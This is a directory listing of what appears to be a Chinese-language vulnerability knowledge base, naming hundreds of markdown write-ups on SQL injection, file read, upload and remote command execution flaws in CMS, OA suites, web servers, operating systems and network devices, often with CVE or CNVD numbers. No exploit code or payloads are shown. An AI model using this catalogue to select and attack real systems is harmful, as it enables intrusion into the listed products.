├── CMS漏洞 ├── AspCMS commentList.asp SQL注入漏洞.md ├── BSPHP index.php 未授权访问 信息泄露漏洞.md ├── CmsEasy crossall_act.php SQL注入漏洞.md ├── CmsEasy language_admin.php 后台命令执行漏洞.md ├── CmsEasy update_admin.php 后台任意文件上传漏洞.md ├── CxCMS Resource.ashx 任意文件读取漏洞.md ├── DedeCMS common.func.php 远程命令执行漏洞.md ├── Discuz!X 3.4 admincp_setting.php 后台SQL注入漏洞.md ├── DocCMS keyword SQL注入漏洞.md ├── Ke361 AuthManagerController.class.php 后台SQL注入漏洞.md ├── Ke361 DistrictController.class.php 后台SQL注入漏洞 CNVD-2021-25002.md ├── Ke361 GoodsController.class.php SSRF漏洞.md ├── Ke361 MenuController.class.php 后台SQL注入漏洞 CNVD-2021-25002.md ├── Ke361 TopicController.class.php SQL注入漏洞 CNVD-2017-04380.md ├── OKLite 1.2.25 后台插件安装 任意文件上传.md ├── OKLite 1.2.25 后台模块导入 任意文件上传 CVE-2019-16131.md ├── OKLite 1.2.25 后台风格模块 任意文件删除 CVE-2019-16132.md ├── OpenSNS Application ShareController.class.php 远程命令执行漏洞.md ├── OpenSNS AuthorizeController.class.php 后台远程命令执行漏洞.md ├── OpenSNS ChinaCityController.class.php SQL注入漏洞.md ├── OpenSNS CurlModel.class.php SSRF漏洞.md ├── OpenSNS ThemeController.class.php 后台任意文件上传漏洞.md ├── OpenSNS ThemeController.class.php 后台任意文件下载漏洞.md ├── Pb-CMS Shiro默认密钥 远程命令执行漏洞.md ├── PbootCMS domain SQL注入漏洞.md ├── PbootCMS ext_price SQL注入漏洞.md ├── PbootCMS search SQL注入漏洞.md ├── ShopXO download 任意文件读取漏洞 CNVD-2021-15822.md ├── TypesetterCMS 后台任意文件上传.md ├── WeiPHP3.0 session_id 任意文件上传漏洞.md ├── WeiPHP5.0 bind_follow SQL注入漏洞.md ├── WeiPHP5.0 download_imgage 前台文件任意读取 CNVD-2020-68596.md ├── WeiPHP5.0 任意用户Cookie伪造 CNVD-2021-09693.md ├── YzmCMS Version 小于V5.8正式版 后台采集模块 SSRF漏洞.md ├── ZZZCMS parserSearch 远程命令执行漏洞.md ├── emlog widgets.php 后台SQL注入漏洞.md ├── ezEIP 4.1.0 信息泄露漏洞.md ├── 华宜互联 硬编码超级管理员漏洞.md ├── 原创先锋 后台管理平台 未授权访问漏洞.md ├── 发货100 M_id SQL注入漏洞 CNVD-2021-30193.md ├── 快排CMS Socket.php 日志信息泄露漏洞.md ├── 快排CMS 后台XSS漏洞.md ├── 快排CMS 后台任意文件上传漏洞.md ├── 极致CMS 1.81 后台存储型XSS.md ├── 极致CMS alipay_return_pay SQL注入漏洞.md ├── 极致CMS 后台文件编辑插件 任意文件上传.md ├── 狮子鱼CMS ApiController.class.php SQL注入漏洞.md ├── 狮子鱼CMS ApigoodController.class.php SQL注入漏洞.md ├── 狮子鱼CMS image_upload.php 任意文件上传.md ├── 狮子鱼CMS wxapp.php 任意文件上传漏洞.md ├── 禅道 11.6 api-getModel-api-getMethod-filePath 任意文件读取漏洞.md ├── 禅道 11.6 api-getModel-api-sql-sql 后台SQL注入漏洞.md ├── 禅道 11.6 api-getModel-editor-save-filePath 任意文件写入漏洞.md ├── 禅道 12.4.2 CSRF漏洞 CNVD-2020-68552.md ├── 禅道 12.4.2 后台任意文件上传漏洞 CNVD-C-2020-121325.md └── 齐博CMS V7 job.php 任意文件读取漏洞.md ├── OA产品漏洞 ├── 一米OA getfile.jsp 任意文件读取漏洞.md ├── 万户OA download_ftp.jsp 任意文件下载漏洞.md ├── 万户OA download_old.jsp 任意文件下载漏洞.md ├── 万户OA downloadhttp.jsp 任意文件下载漏洞.md ├── 万户OA fileUpload.controller 任意文件上传漏洞.md ├── 万户OA showResult.action 后台SQL注入漏洞.md ├── 万户OA smartUpload.jsp 任意文件上传漏洞.md ├── 信呼OA beifenAction.php 后台目录遍历漏洞.md ├── 华天动力OA 8000版 workFlowService SQL注入漏洞.md ├── 启莱OA CloseMsg.aspx SQL注入漏洞.md ├── 启莱OA messageurl.aspx SQL注入漏洞.md ├── 启莱OA treelist.aspx SQL注入漏洞.md ├── 帆软报表 2012 SSRF漏洞.md ├── 帆软报表 2012 信息泄露漏洞.md ├── 帆软报表 V8 任意文件读取漏洞 CNVD-2018-04757.md ├── 帆软报表 V9 任意文件覆盖文件上传.md ├── 新点OA ExcelExport 敏感信息泄露漏洞.md ├── 智明 SmartOA EmailDownload.ashx 任意文件下载漏洞.md ├── 极限OA video_file.php 任意文件读取漏洞.md ├── 泛微OA DBconfigReader.jsp 数据库配置信息泄漏漏洞.md ├── 泛微OA E-Bridge saveYZJFile 任意文件读取漏洞.md ├── 泛微OA E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204.md ├── 泛微OA E-Cology HrmCareerApplyPerView.jsp SQL注入漏洞.md ├── 泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202.md ├── 泛微OA E-Cology getSqlData SQL注入漏洞.md ├── 泛微OA E-Cology users.data 敏感信息泄漏.md ├── 泛微OA E-Office UploadFile.php 任意文件上传漏洞 CNVD-2021-49104.md ├── 泛微OA E-Office UserSelect 未授权访问漏洞.md ├── 泛微OA E-Office group_xml.php SQL注入漏洞.md ├── 泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞.md ├── 泛微OA E-Office officeserver.php 任意文件读取漏洞.md ├── 泛微OA E-Weaver SignatureDownLoad 任意文件读取漏洞.md ├── 泛微OA WorkflowCenterTreeData SQL注入漏洞.md ├── 泛微OA WorkflowServiceXml RCE.md ├── 泛微OA getdata.jsp SQL注入漏洞.md ├── 泛微OA ln.FileDownload 任意文件读取漏洞.md ├── 泛微OA sysinterfacecodeEdit.jsp 任意文件上传漏洞.md ├── 泛微OA uploadOperation.jsp 任意文件上传.md ├── 泛微OA weaver.common.Ctrl 任意文件上传漏洞.md ├── 用友 ERP-NC NCFindWeb 目录遍历漏洞.md ├── 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞.md ├── 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923.md ├── 用友 NC NCFindWeb 任意文件读取漏洞.md ├── 用友 NC XbrlPersistenceServlet反序列化.md ├── 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞.md ├── 用友 NC 反序列化RCE漏洞.md ├── 用友 NCCloud FS文件管理SQL注入.md ├── 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞.md ├── 用友 U8 OA test.jsp SQL注入漏洞.md ├── 红帆OA ioFileExport.aspx 任意文件读取漏洞.md ├── 致翔OA msglog.aspx SQL注入漏洞.md ├── 致远OA A6 DownExcelBeanServlet 用户敏感信息泄露.md ├── 致远OA A6 config.jsp 敏感信息泄漏漏洞.md ├── 致远OA A6 createMysql.jsp 数据库敏感信息泄露.md ├── 致远OA A6 initDataAssess.jsp 用户敏感信息泄露.md ├── 致远OA A6 setextno.jsp SQL注入漏洞.md ├── 致远OA A6 test.jsp SQL注入漏洞.md ├── 致远OA A8 htmlofficeservlet 任意文件上传漏洞.md ├── 致远OA A8 status.jsp 信息泄露漏洞.md ├── 致远OA ajax.do 任意文件上传 CNVD-2021-01627.md ├── 致远OA getSessionList.jsp Session泄漏漏洞.md ├── 致远OA webmail.do 任意文件下载 CNVD-2020-62422.md ├── 蓝凌OA admin.do JNDI远程命令执行.md ├── 蓝凌OA custom.jsp 任意文件读取漏洞.md ├── 蓝凌OA kmImeetingRes.do 后台SQL注入漏洞 CNVD-2021-01363.md ├── 蓝凌OA sysSearchMain.do 远程命令执行漏洞.md ├── 蓝凌OA treexml.tmpl 远程命令执行漏洞.md ├── 通达OA v11.2 upload.php 后台任意文件上传漏洞.md ├── 通达OA v11.5 login_code.php 任意用户登录.md ├── 通达OA v11.5 logincheck_code.php 登陆绕过漏洞.md ├── 通达OA v11.5 swfupload_new.php SQL注入漏洞.md ├── 通达OA v11.6 insert SQL注入漏洞 ├── 通达OA v11.6 print.php 任意文件删除&RCE.md ├── 通达OA v11.6 report_bi.func.php SQL注入漏洞.md ├── 通达OA v11.7 auth_mobi.php 在线用户登录漏洞.md ├── 通达OA v11.7 delete_cascade.php 后台SQL注入.md ├── 通达OA v11.8 api.ali.php 任意文件上传漏洞.md ├── 通达OA v11.8 getway.php 远程文件包含漏洞.md ├── 通达OA v11.8 update.php 后台文件包含XSS漏洞.md ├── 通达OA v11.8 update.php 后台文件包含命令执行漏洞.md ├── 通达OA v11.9 upsharestatus 后台SQL注入漏洞.md ├── 通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞.md ├── 通达OA v2017 action_upload.php 任意文件上传漏洞.md ├── 通达OA v2017 video_file.php 任意文件下载漏洞.md ├── 通达OA 部分漏洞信息整合.md ├── 金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞.md ├── 金和OA C6 OpenFile.aspx 后台越权敏感文件遍历漏洞.md ├── 金和OA C6 download.jsp 任意文件读取漏洞.md ├── 金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞.md └── 金蝶OA server_file 目录遍历漏洞.md ├── README.md ├── Web应用漏洞 ├── 1039家校通 万能密码绕过 CNVD-2020-31494.md ├── 1039家校通 后台任意文件上传漏洞.md ├── 360天擎 gettablessize 数据库信息泄露漏洞.md ├── 360天擎 rptsvcsyncpoint 前台SQL注入.md ├── AVCON6 系统管理平台 download.action 任意文件下载漏洞.md ├── AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞.md ├── Active UC index.action 远程命令执行漏洞.md ├── Adobe ColdFusion upload.cfm 任意文件上传漏洞 CVE-2018-15961.md ├── Alibaba AnyProxy fetchBody 任意文件读取漏洞.md ├── Alibaba Canal config 云密钥信息泄露漏洞.md ├── Alibaba Nacos 未授权访问漏洞.md ├── Appspace jsonprequest SSRF漏洞 CVE-2021-27670.md ├── Atlassian Bitbucket 登录绕过漏洞.md ├── Atlassian Confluence doenterpagevariables.action 远程命令执行漏洞 CVE-2021-26084.md ├── Atlassian Confluence preview SSTI模版注入漏洞 CVE-2019-3396.md ├── Atlassian Jira ViewUserHover.jspa 用户信息泄露漏洞 CVE-2020-14181.md ├── Atlassian Jira cfx 任意文件读取漏洞 CVE-2021-26086.md ├── Atlassian Jira com.atlassian.jira 敏感信息泄漏 CVE-2019-8442.md ├── Atlassian Jira groupuserpicker 用户信息枚举漏洞 CVE-2019-8449.md ├── Atlassian Jira makeRequest SSRF漏洞 CVE-2019-8451.md ├── CMA客诉管理系统 upFile.ashx 任意文件上传漏洞.md ├── Casbin get-users 账号密码泄漏漏洞.md ├── Cerebro request SSRF漏洞.md ├── Citrix XenMobile 任意文件读取 CVE-2020-8209.md ├── Coremail 配置信息泄露漏洞.md ├── Crawlab file 任意文件读取漏洞.md ├── Crawlab users 任意用户添加漏洞.md ├── E-message 越权访问漏洞.md ├── Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞.md ├── Evolucare Ecsimaging new_movie.php 远程命令执行漏洞.md ├── F5 BIG-IP iControl REST身份认证绕过漏洞 CVE-2022-1388.md ├── F5 BIG-IP 远程代码执行漏洞 CVE-2020-5902.md ├── F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986.md ├── Fhem FileLog_logWrapper 任意文件读取漏洞 CVE-2020-19360.md ├── Gerapy clone 后台远程命令执行漏洞 CVE-2021-32849.md ├── Gerapy parse 后台远程命令执行漏洞.md ├── Gerapy read 后台任意文件读取漏洞.md ├── GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413.md ├── GitLab SSRF漏洞 CVE-2021-22214.md ├── Grafana mysql 后台任意文件读取漏洞 CVE-2019-19499.md ├── Grafana plugins 任意文件读取漏洞 CVE-2021-43798.md ├── H3C IMC dynamiccontent.properties.xhtm 远程命令执行.md ├── H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞.md ├── H3C SecParh堡垒机 get_detail_view.php 任意用户登录漏洞.md ├── Harbor 未授权创建管理员漏洞 CVE-2019-16097.md ├── Hue 后台编辑器命令执行漏洞.md ├── IBOS 数据库模块 后台任意文件上传漏洞.md ├── ICEFlow VPN 信息泄露漏洞.md ├── IceWarp WebClient basic 远程命令执行漏洞.md ├── JD-FreeFuck 后台命令执行漏洞.md ├── Jellyfin RemoteImageController.cs SSRF漏洞 CVE-2021-29490.md ├── Jellyfin 任意文件读取漏洞 CVE-2021-21402.md ├── JumpServer 未授权接口 远程命令执行漏洞.md ├── Jupyter Notebook 未授权访问远程命令执行漏洞.md ├── Konga 普通用户越权获取管理员权限漏洞.md ├── Lanproxy 目录遍历漏洞 CVE-2021-3019.md ├── LimeSurvey LimeSurveyFileManager.php 后台任意文件读取漏洞 CVE-2020-11455.md ├── MKdocs 任意文件读取漏洞 CVE-2021-40978.md ├── MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543.md ├── Metabase geojson 任意文件读取漏洞 CVE-2021-41277.md ├── Nexus Repository Manger change-password 低权限修改管理员密码漏洞 CVE-2020-11444.md ├── Nexus Repository Manger extdirect 后台远程命令执行 CVE-2020-10204.md ├── Nexus Repository Manger extdirect 远程命令执行 CVE-2019-7238.md ├── Nexus Repository Manger group 后台远程命令执行 CVE-2020-10199.md ├── Node-RED ui_base 任意文件读取漏洞.md ├── OneBlog 小于v2.2.1 远程命令执行漏洞.md ├── Riskscanner list SQL注入漏洞.md ├── Seo-Panel 4.8.0 反射型XSS漏洞 CVE-2021-3002.md ├── ShowDoc AdminUpdateController.class.php 任意文件上传漏洞 CVE-2021-36440.md ├── ShowDoc PageController.class.php 任意文件上传漏洞.md ├── SonarQube search_projects 项目信息泄露漏洞.md ├── SonarQube values 信息泄露漏洞 CVE-2020-27986.md ├── SpiderFlow save 远程命令执行漏洞.md ├── TamronOS IPTV系统 ping 任意命令执行漏洞.md ├── TamronOS IPTV系统 submit 任意用户创建漏洞.md ├── TerraMaster TOS RCE CVE-2020-28188.md ├── TerraMaster TOS createRaid 远程命令执行漏洞 CVE-2022-24989.md ├── TerraMaster TOS exportUser.php 远程命令执行.md ├── TerraMaster TOS makecvs.php 远程命令执行漏洞 CVE-2020-28188.md ├── TerraMaster TOS 任意账号密码修改漏洞 CVE-2020-28186.md ├── TerraMaster TOS 信息泄漏漏洞 CVE-2022-24990.md ├── TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187.md ├── TerraMaster TOS 用户枚举漏洞 CVE-2020-28185.md ├── WSO2 fileupload 任意文件上传漏洞 CVE-2022-29464.md ├── WSO2 proxy SSRF漏洞 WSO2-2019-0598.md ├── WiseGiga NAS down_data.php 任意文件下载漏洞.md ├── WiseGiga NAS group.php 远程命令执行漏洞.md ├── XXL-JOB 任务调度中心 后台任意命令执行漏洞.md ├── YApi 接口管理平台 后台命令执行漏洞.md ├── eGroupWare spellchecker.php 远程命令执行漏洞.md ├── imo 云办公室 Imo_DownLoadUI.php 任意文件下载漏洞.md ├── imo 云办公室 corpfile.php 远程命令执行漏洞.md ├── imo 云办公室 get_file.php 远程命令执行漏洞.md ├── kkFileView getCorsFile 任意文件读取漏洞 CVE-2021-43734.md ├── nginxWebUI cmdOver 后台命令执行漏洞.md ├── 七牛云 logkit log_path 任意文件读取漏洞.md ├── 三汇SMG 网关管理软件 down.php 任意文件读取漏洞.md ├── 中新金盾信息安全管理系统 默认超级管理员密码漏洞.md ├── 中科网威 NPFW防火墙 CommandsPolling.php 任意文件读取漏洞.md ├── 中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞.md ├── 久其财务报表 download.jsp 任意文件读取漏洞.md ├── 云时空 社会化商业ERP系统 Shiro框架 远程命令执行漏洞.md ├── 云时空 社会化商业ERP系统 validateLoginName SQL注入漏洞.md ├── 亿赛通 电子文档安全管理系统 dataimport 远程命令执行漏洞.md ├── 亿邮电子邮件系统 moni_detail.do 远程命令执行漏洞.md ├── 众望网络 微议管理系统 后台updatefile.html 任意文件上传漏洞.md ├── 会捷通云视讯 fileDownload 任意文件读取漏洞.md ├── 会捷通云视讯 list 目录文件泄露漏洞.md ├── 会捷通云视讯 登录绕过漏洞.md ├── 信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 后台命令执行漏洞.md ├── 吉拉科技 LVS精益价值管理系统 Business 目录遍历漏洞.md ├── 和信创天云桌面系统 远程命令执行 RCE漏洞.md ├── 图创软件 图书馆站群管理系统 任意文件读取漏洞.md ├── 天融信 DLP 未授权访问漏洞.md ├── 天融信 TopApp-LB SQL注入漏洞.md ├── 天融信 TopApp-LB enable_tool_debug.php 远程命令执行漏洞.md ├── 天融信 TopApp-LB 命令执行漏洞.md ├── 天融信 TopApp-LB系统 任意登陆.md ├── 孚盟云 AjaxMethod.ashx SQL注入漏洞.md ├── 安天 高级可持续威胁安全检测系统 越权访问漏洞.md ├── 安徽阳光心健 心理测量平台 目录遍历漏洞 CNVD-2021-01929.md ├── 安美数字 酒店宽带运营系统 server_ping.php 远程命令执行漏洞.md ├── 宝塔 phpmyadmin未授权访问漏洞.md ├── 思福迪堡垒机 任意用户登录漏洞.md ├── 思迪数据 Home 登录绕过漏洞.md ├── 昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞.md ├── 智慧校园管理系统 前台任意文件上传漏洞.md ├── 杭州法源软件 公证实务教学软件 SQL注入漏洞.md ├── 杭州法源软件 法律知识数据库系统 后台XSS漏洞.md ├── 极通EWEBS casmain.xgi 任意文件读取漏洞.md ├── 极通EWEBS testweb.php 敏感信息泄露漏洞.md ├── 汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞.md ├── 汉王人脸考勤管理系统 Check SQL注入漏洞.md ├── 浪潮ClusterEngineV4.0 sysShell 任意命令执行漏洞.md ├── 浪潮ClusterEngineV4.0 任意用户登录漏洞.md ├── 浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224.md ├── 深信服 EDR c.php 远程命令执行漏洞 CNVD-2020-46552.md ├── 深信服 EDR 后台任意用户登陆漏洞.md ├── 深信服 SSL VPN 客户端远程文件下载.md ├── 深信服 应用交付报表系统 download.php 任意文件读取漏洞.md ├── 深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞.md ├── 深信服 日志中心 c.php 远程命令执行漏洞.md ├── 深信服 行为感知系统 c.php 远程命令执行漏洞.md ├── 畅捷CRM get_usedspace.php SQL注入漏洞.md ├── 畅捷CRM 后台附件任意文件上传漏洞.md ├── 科达 MTS转码服务器 任意文件读取漏洞.md ├── 科达 网络键盘控制台 任意文件读取漏洞.md ├── 科迈 RAS系统 硬编码管理员漏洞.md ├── 章管家 Druid未授权访问漏洞.md ├── 紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638.md ├── 绿盟 BAS日志数据安全性分析系统 accountmanage 未授权访问漏洞.md ├── 绿盟 UTS综合威胁探针 信息泄露登陆绕过漏洞.md ├── 网御星云 web防护系统 信息泄露漏洞.md ├── 若依管理系统 Druid未授权访问.md ├── 若依管理系统 后台任意文件读取 CNVD-2021-01931.md ├── 蓝海卓越计费管理系统 debug.php 远程命令执行漏洞.md ├── 蓝海卓越计费管理系统 download.php 任意文件读取漏洞.md ├── 金山 V8 终端安全系统 downfile.php 任意文件读取漏洞.md ├── 金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞.md ├── 金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞.md ├── 金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336.md ├── 银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437.md ├── 银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞.md ├── 银达汇智 智慧综合管理平台 FileUp.aspx 任意文件上传漏洞 ├── 阿尔法科技 虚拟仿真实验室 未授权访问漏洞.md ├── 零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113.md ├── 飞视美 视频会议系统 Struts2 远程命令执行漏洞.md ├── 魅课 OM视频会议系统 proxy.php 文件包含漏洞.md ├── 默安 幻阵蜜罐未授权访问 RCE.md ├── 齐治堡垒机 gui_detail_view.php 任意用户登录漏洞.md └── 龙璟科技 电池能量BEMS downloads 任意文件下载漏洞.md ├── Web服务器漏洞 ├── ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778.md ├── Apache ActiveMQ Console控制台默认弱口令.md ├── Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md ├── Apache Cocoon XML注入 CVE-2020-11991.md ├── Apache CouchDB epmd 远程命令执行漏洞 CVE-2022-24706.md ├── Apache Druid LoadData 任意文件读取漏洞 CVE-2021-36749.md ├── Apache Druid 远程代码执行漏洞 CVE-2021-25646.md ├── Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518.md ├── Apache Flink 目录遍历漏洞 CVE-2020-17519.md ├── Apache HTTPd 换行解析漏洞 CVE-2017-15715.md ├── Apache HTTPd 路径穿越漏洞 CVE-2021-41773.md ├── Apache HTTPd 路径穿越漏洞 CVE-2021-42013.md ├── Apache Kylin CubeService.java 命令注入漏洞 CVE-2020-1956.md ├── Apache Kylin DiagnosisController.java 命令注入漏洞 CVE-2020-13925.md ├── Apache Kylin config 未授权配置泄露 CVE-2020-13937.md ├── Apache Log4j2 JNDI 远程命令执行漏洞 CVE-2021-44228.md ├── Apache Mod_jk 访问控制权限绕过 CVE-2018-11759.md ├── Apache OFBiz RMI反序列化漏洞 CVE-2021-26295.md ├── Apache ShenYu dashboardUser 账号密码泄漏漏洞 CVE-2021-37580.md ├── Apache Shiro 小于1.2.4反序列化漏洞 CVE-2016-4437.md ├── Apache SkyWalking graphql SQL注入漏洞 CVE-2020-9483.md ├── Apache Solr JMX服务 RCE CVE-2019-12409.md ├── Apache Solr Log4j组件 远程命令执行漏洞.md ├── Apache Solr RCE 未授权上传漏洞 CVE-2020-13957.md ├── Apache Solr RCE 远程命令执行漏洞 CVE-2017-12629.md ├── Apache Solr Velocity模板远程执行 CVE-2019-17558.md ├── Apache Solr XXE 漏洞 CVE-2017-12629.md ├── Apache Solr 任意文件读取漏洞.md ├── Apache Solr 远程执行漏洞 CVE-2019-0193.md ├── Apache Spark create 未授权访问漏洞.md ├── Apache Spark unTarUsingTar 命令注入漏洞 SPARK-38631.md ├── Apache Struts2 S2-062 远程代码执行漏洞 CVE-2021-31805.md ├── Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md ├── Apache Tomcat WebSocket 拒绝服务漏洞 CVE-2020-13935.md ├── Apache Tomcat 信息泄露漏洞 CVE-2021-24122.md ├── Apache Tomcat 远程代码执行漏洞 CVE-2017-12615.md ├── Apache Zeppelin 未授权任意命令执行漏洞.md ├── Apache ZooKeeper 未授权访问漏洞 CVE-2014-085漏洞描述.md ├── GoCD plugin 任意文件读取漏洞 CVE-2021-43287.md ├── JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504.md ├── Jenkins CI 远程代码执行漏洞 CVE-2017-1000353.md ├── Jenkins checkScript 远程命令执行漏洞 CVE-2018-1000861.md ├── Jenkins script 远程命令执行漏洞.md ├── Nginx越界读取缓存漏洞 CVE-2017-7529.md ├── PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381.md ├── WebLogic Local File Inclusion 本地文件包含漏洞 CVE-2022-21371.md ├── Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109.md ├── Weblogic SSRF漏洞 CVE-2014-4210.md ├── Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271.md ├── Weblogic 反序列化远程代码执行漏洞 CVE-2019-2725.md └── Zabbix SAML身份绕过漏洞 CVE-2022-23131.md ├── 开发框架漏洞 ├── Laravel .env 配置文件泄露 CVE-2017-16894.md ├── Laravel 小于 8.4.2 Debug模式 _ignition 远程代码执行漏洞 CVE-2021-3129.md ├── MotionEye 视频监控组件 list 信息泄漏洞 CVE-2022-25568.md ├── PHPUnit eval-stdin.php 远程命令执行漏洞 CVE-2017-9841.md ├── Rails Accept 任意文件读取漏洞 CVE-2019-5418.md ├── Rails sprockets 任意文件读取漏洞 CVE-2018-3760.md ├── Spring Cloud Function SPEL 远程命令执行漏洞.md └── jQuery XSS漏洞 CVE-2020-11022 11023.md ├── 开发语言漏洞 ├── GO TLS握手 崩溃漏洞 CVE-2021-34558.md └── PHP zerodium后门漏洞.md ├── 操作系统漏洞 ├── Linux DirtyPipe权限提升漏洞 CVE-2022-0847.md ├── Linux Polkit权限提升漏洞 CVE-2021-4034.md ├── Linux eBPF权限提升漏洞 CVE-2022-23222.md ├── Linux kernel权限提升漏洞 CVE-2021-3493.md ├── Linux sudo权限提升漏洞 CVE-2021-3156.md ├── Windows CryptoAPI欺骗漏洞 CVE-2020-0601.md ├── Windows SMB远程代码执行漏洞 CVE-2020-0796.md ├── Windows Win32k 内核提权漏洞 CVE-2022-21882.md └── Windows Win32k 本地提权漏洞 CVE-2021-1732.md ├── 服务器应用漏洞 ├── ClickHouse API 数据库接口未授权访问漏洞.md ├── Elasticsearch 未授权访问.md ├── Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417.md ├── Git for Visual Studio远程执行代码漏洞 CVE-2021-21300.md ├── Git-LFS 远程命令执行漏洞 CVE-2020-27955.md ├── Microsoft Exchange SSRF漏洞 CVE-2021-26885.md ├── Microsoft Exchange 远程命令执行 CVE-2021-27065 26857 26858 27065.md ├── MinIO SSRF漏洞 CVE-2021-21287.md ├── NVIDIA GPU显示驱动程序 信息泄露 CVE-2021-1056.md ├── OpenSSH 命令注入漏洞 CVE-2020-15778.md ├── OpenSSL 心脏滴血漏洞 CVE-2014-0160.md ├── QEMU 虚拟机逃逸漏洞 CVE-2020-14364.md ├── Redis Lua 沙箱绕过 远程命令执行 CVE-2022-0543.md ├── Redis 小于5.0.5 主从复制 RCE.md ├── SaltStack 未授权访问命令执行漏洞 CVE-2020-16846 25592.md ├── Saltstack 远程命令执行漏洞 CVE-2020-11651 11652.md ├── VMware Workspace ONE Access SSTI漏洞 CVE-2022-22954.md ├── VMware vCenter 任意文件读取漏洞.md ├── VMware vRealize Operations Manager SSRF漏洞 CVE-2021-21975.md ├── VoIPmonitor 远程命令执行漏洞 CVE-2021-30461.md ├── Windows Chrome 远程命令执行漏洞.md ├── WordPress 3DPrint Lite 3dprint-lite-functions.php 任意文件上传漏洞.md ├── WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738.md ├── WordPress Redux Framework class-redux-helpers.php 敏感信息泄漏漏洞 CVE-2021-38314.md ├── WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119.md ├── WordPress WP_Query SQL 注入漏洞 CVE-2022-21661.md └── 向日葵 check 远程命令执行漏洞 CNVD-2022-10270.md └── 网络设备漏洞 ├── ACTI 视频监控 images 任意文件读取漏洞.md ├── Amcrest IP Camera Web Sha1Account1 账号密码泄漏漏洞 CVE-2017-8229.md ├── Arcadyan固件 cgi_i_filter.js 配置信息泄漏漏洞 CVE-2021-20092.md ├── Arcadyan固件 image 路径遍历漏洞 CVE-2021-20090.md ├── Cisco ASA设备 任意文件读取漏洞 CVE-2020-3452.md ├── Cisco ASA设备任意文件删除漏洞 CVE-2020-3187.md ├── Cisco HyperFlex HX storfs-asup 远程命令执行漏洞 CVE-2021-1497.md ├── Cisco HyperFlex HX upload 任意文件上传漏洞 CVE-2021-1499.md ├── Crestron aj.html 账号密码泄漏漏洞 CVE-2022-23178.md ├── D-LINK DAP-2020 webproc 任意文件读取漏洞 CVE-2021-27250.md ├── D-Link AC管理系统 默认账号密码.md ├── D-Link DAR-8000 importhtml.php 远程命令执行漏洞.md ├── D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078.md ├── D-Link DSL-28881A FTP配置错误 CVE-2020-24578.md ├── D-Link DSL-28881A 信息泄露 CVE-2020-24577.md ├── D-Link DSL-28881A 未授权访问 CVE-2020-24579.md ├── D-Link DSL-28881A 远程命令执行 CVE-2020-24581.md ├── D-Link DSR-250N 万能密码漏洞.md ├── D-Link Dir-645 getcfg.php 账号密码泄露漏洞 CVE-2019-17506.md ├── D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞.md ├── DD-WRT UPNP缓冲区溢出漏洞 CVE-2021-27137.md ├── DVR 登录绕过漏洞 CVE-2018-9995.md ├── DrayTek企业网络设备 远程命令执行 CVE-2020-8515.md ├── FLIR-AX8 download.php 任意文件下载.md ├── Finetree 5MP 摄像机 user_pop.php 任意用户添加漏洞 CNVD-2021-42372.md ├── H3C SecPath下一代防火墙 任意文件下载漏洞.md ├── HIKVISION DSIDSIPC 等设备 远程命令执行漏洞 CVE-2021-36260.md ├── HIKVISION 流媒体管理服务器 user.xml 账号密码泄漏漏洞.md ├── HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544.md ├── HIKVISION 联网网关 downdb.php 任意文件读取漏洞.md ├── HIKVISION 视频编码设备接入网关 $DATA 任意文件读取.md ├── HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞.md ├── Huawei DG8045 deviceinfo 信息泄漏漏洞.md ├── Huawei HG659 lib 任意文件读取漏洞.md ├── Intelbras Wireless 未授权与密码泄露 CVE-2021-3017.md ├── JCG JHR-N835R 后台命令执行漏洞.md ├── KEDACOM数字系统接入网关 任意文件读取漏洞.md ├── KONE 通力电梯管理系统 app_show_log_lines.php 任意文件读取漏洞.md ├── Kyan 网络监控设备 hosts 账号密码泄露漏洞.md ├── Kyan 网络监控设备 license.php 远程命令执行漏洞.md ├── Kyan 网络监控设备 module.php 远程命令执行漏洞.md ├── Kyan 网络监控设备 run.php 远程命令执行漏洞.md ├── Kyan 网络监控设备 time.php 远程命令执行漏洞.md 